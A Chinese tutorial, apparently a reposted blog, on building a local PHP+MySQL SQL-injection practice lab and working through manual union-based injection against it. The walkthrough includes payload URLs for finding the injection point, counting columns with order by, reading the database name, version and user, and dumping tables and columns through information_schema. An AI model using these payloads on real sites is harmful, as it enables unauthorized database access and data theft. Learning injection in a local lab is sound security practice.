php+mysql注入环境搭建

转载 2018年04月15日 19:54:17

php+mysql注入环境搭建需要资料如下:

链接:http://pan.baidu.com/s/1kV746Dx 密码:026d

1.安装phpmystudy

自定义安装好phpmystudy,启动(运行phpmystudy)


2.编程一个注入页面(下载好的sql.php)

在phpmystudy安装路径下WWW目录创建一下文件夹test,

然后把下载好的sql.php复制一份到test下。



3.数据接受(创建数据库,注入传递参数到数据库)

http://127.0.0.1/phpmyadmin/           用户名密码都是root

创建一个表列数据,接受传递参数查询数据库。(我这里直接下数据库test下,创建一张biao表)

  1. CREATE TABLE IF NOT EXISTS `biao` (
  2.   `id` int(10) NOT NULL,
  3.   `title` varchar(1000) NOT NULL,
  4.   `text` varchar(1000) NOT NULL
  5. ) ENGINE=MyISAM DEFAULT CHARSET=GBK;

  6. INSERT INTO `biao` (`id`, `title`, `text`) VALUES
  7. (1,'渗透注入','本地搭建注入环境')



好了,到此php+mysql注入环境搭建完成。


测试:


传递的参数?i=1

http://127.0.0.1/test/sql.php?i=1




第一步:判断环境,寻找注入点

确定注入点 : 
数字型:   用'号报错 就有注入的希望     或者 and 1=1  and 1=2 检测  一个正常 一个返回不正常 95%存在注入点用 






猜解字段数:http://127.0.0.1/test/sql.php?i=1 and  1=1  order by 3  (3正常,4不正常,字段数为3)




猜解数据库名:http://127.0.0.1/test/sql.php?i=1 and 1=1  union select 1,2,3(字段个数) from biao(表名)



获取数据库信息:

数据库名 database()

数据库版本 version()

数据库用户 user()

操作系统 @@version_compile_os

http://127.0.0.1/test/sql.php?i=1 and 1=1  union select database(),version(),user()


得到数据库为test,用户为root,数据库版本5.5.47


查询test(使用小葵多功能转换工具得到hex编码)下的表名信息:

http://127.0.0.1/test/sql.php?i=1 and 1=1  union select table_name,2,3 from information_schema.tables where table_schema=0x74657374



查询biao(使用小葵多功能转换工具得到hex编码)下的列名信息:

http://127.0.0.1/test/sql.php?i=1 and 1=1  union select column_name,2,3 from information_schema.columns where table_name=0x6269616F






直接获取biao表名下的title列名的数据:

http://127.0.0.1/test/sql.php?i=1 and 1=1  union select title,2,3 from test.biao

php+mysql注入环境搭建及测试(上)

最近在观看小迪的第十三期视频,从里面学到了很多有关渗透方面的知识,弄懂了一些基础的mysql注入原理。同时记录下学习渗透的一些方法。php+mysql注入环境搭建需要资料如下:链接:http://pa...
  • zhj082
  • zhj082
  • 2016-07-18 04:14:04
  • 1341

SQL注入系列之环境搭建(二)----PHP+Mysql注入环境搭建

一、手写一个带sql注入的页面 php+mysql注入页面编写步骤 1.接受参数 2.连接数据库 3.组合sql语句 4.执行sql语句并返回显示 新建一个sqlt...
  • u011781521
  • u011781521
  • 2016-12-29 19:25:06
  • 2344

php+mysql 环境搭建软件及教程

  • 2011年05月09日 13:57
  • 938KB
  • 下载

PHP+Mysql 带SQL注入源码 下载

  • 2017年01月01日 17:41
  • 3KB
  • 下载

Php+Mysql注入专题

本文作者:alpha文章出处:炎黄兵团Php+Mysql注入专题 #------------------- #文章中的图片没有上传,要看的可直接与我联系 #----------------------...
  • fallingleaf
  • fallingleaf
  • 2007-04-12 21:01:00
  • 899

Windows XP下PHP+MySQL环境搭建(一)

  • 2012年03月13日 21:46
  • 640KB
  • 下载

Windows XP下PHP+MySQL环境搭建(二)

  • 2012年03月13日 21:47
  • 356KB
  • 下载

PHP 7.1 + Apache 2.4 + MySQL 5.6非集成环境配置

最近因为一个项目需要用到PHP环境,嫌集成环境“脏”(只是个人用软件方面的洁癖……不喜欢那种强行集合的东西,现在的集成环境真的还可以,但是我过不了自己心理这关……),就自己扒贴+看各种乱七八糟教程,终...
  • tick_tock97
  • tick_tock97
  • 2017-05-10 13:15:37
  • 2130

一个PHP+Mysql手工注入例子

说下我的基本思路: 1、目标站点环境为:Windows+Apache+Mysql+PHP 2、存在SQL注入,能否直接写一句话木马 3、存在SQL注入,获取数据库中用户口令,登录应用系统后上传w...
  • Praifire
  • Praifire
  • 2016-07-16 22:38:16
  • 5108

PHP与MySQL 中的SQL注入式漏洞

SQL注入式漏洞是许多PHP程序的主要安全危害,产生的原因是在向数据库执行插入等语句时,web开发者允许最终用户操作变量(例如根据表单提交内容显示相应信息),通常是$_GET、$_POST或$_SES...
  • angelmelody
  • angelmelody
  • 2007-11-04 17:23:00
  • 1292
收藏助手
不良信息举报
您举报文章:php+mysql注入环境搭建
举报原因:
原因补充:

(最多只允许输入30个字)